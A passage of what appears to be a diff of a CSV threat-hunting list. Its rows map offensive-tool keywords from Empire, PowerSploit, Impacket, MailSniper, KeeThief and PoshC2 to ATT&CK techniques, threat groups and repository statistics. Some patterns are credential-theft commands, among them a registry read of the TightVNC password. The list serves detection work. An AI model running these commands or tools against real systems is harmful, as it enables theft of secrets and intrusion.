","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-GPPPassword*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-GPPPassword.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-GPPPassword.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Get-HeadersWithPrtCookies*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-GPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-GPPPassword.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-HeadersWithPrtCookies*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetHijackableDllName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" -"*Get-ImageNtHeaders*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-implantworkingdirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-ImageNtHeaders*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-implantworkingdirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
"*Get-InactiveDomainAdmins*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*Get-InternetExplorerBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-InternetExplorerHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-InternetExplorerBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-InternetExplorerHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). 
You can query this with PowerShell as follows.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*Get-KeePassDatabaseKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeePassDatabaseKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeePassDatabaseKey*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*Get-KeePassINIFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-KeePassXMLFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 